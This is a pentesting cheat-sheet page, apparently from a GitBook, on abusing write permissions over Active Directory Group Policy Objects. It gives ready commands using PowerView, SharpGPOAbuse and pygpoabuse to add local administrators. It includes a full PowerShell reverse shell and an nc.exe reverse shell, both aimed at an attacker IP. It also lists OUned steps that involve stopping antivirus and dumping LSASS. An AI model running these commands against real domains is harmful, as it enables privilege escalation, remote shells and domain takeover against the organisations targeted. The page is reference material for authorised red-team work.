search
githubEdit

Group Policy Object (GPO)

hashtag
DACL Attacks on a Group Policy Object (GPO)

hashtag
1) WriteProperty on a GPO

We can create an "evil" GPO with a scheduled task for example

With PowerView

New-GPOImmediateTask -Verbose -Force -TaskName 'Update' -GPODisplayName 'weakGPO' -Command cmd -CommandArguments "/c net localgroup administrators user1 /add"

With SharpGPOAbuse

./SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author Administrator --Command "cmd.exe" --Arguments "/c /tmp/nc.exe attacker_ip 4545 -e powershell" --GPOName "weakGPO"

OR simply, add our compromised user to the local administrator group

.\SharpGPOAbuse.exe --AddLocalAdmin --GPOName "weakGPO" --UserAccount USER

Update GPO to run immediately

gpupdate /force

hashtag
Linux

We can update a GPO with a scheduled task for example to obtain a reverse shell

./pygpoabuse.py domain.local/user1 -hashes lm:nt -gpo-id "<GPO_ID>" -powershell -command "\$client = New-Object System.Net.Sockets.TCPClient('attacker_IP',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" -taskname "The task" -description "Important task" -user

Create a local admin

hashtag
2) CreateChild on Policies Cn + WriteProperty on an OU

It is possible to create a fully new GPO and link it to an existing OU

With RSAT module

After GPO refresh on the OU's machines, when the machines will restart the payload will be executed

hashtag
3) Manage Group Policy Links

With this right or GenericWrite on a GPO we can manipulate its gPLink attribute in order to apply an evil GPO to all the children of a descendant OU, even the ones with adminCount=1.

hashtag
Machine

  1. Create a new Windows Server virtual machine connected to the network and install the domain controler features on it. Register it under a subdomain of the current domain (evil.domain.local)

  2. Create an empty GPO on this DC

  3. Reset the machine account password (to remove the unprintable characters)

  4. Stop the antivirus and dump the LSASS to retrieve the password

  5. Create a new computer account on the target domain with a LDAP SPN and the same password as the created DC

  6. Create a new DNS record on the target domain to point the evil subdomain to the attacker machine

  7. Configure the OUned.py tool with the following example. The [SMB] section must be setup to embedded and just a share name

https://github.com/synacktiv/OUned?tab=readme-ov-file#configuration-file

  1. Run OUned.py

hashtag
User

  1. Similarly, create an evil domain controler and a computer account with a LDAP SPN

  2. Create a second evil DC with the same domain as the target domain (domain.local). As the first evil DC, reset and retrieve its password

  3. Create a new SMB share on the second evil DC

  4. Create a new computer account on the target domain with the HOST SPN and add a DNS record resolving this machine to the attacker IP

  5. Configure the OUned.py tool with the following example. The [SMB] section must be setup to forwarded with the other information setup

https://github.com/synacktiv/OUned?tab=readme-ov-file#configuration-file

  1. Run OUned.py

PreviousDACL Attacks on the domain/forestNextDACL Attacks on a group

Last updated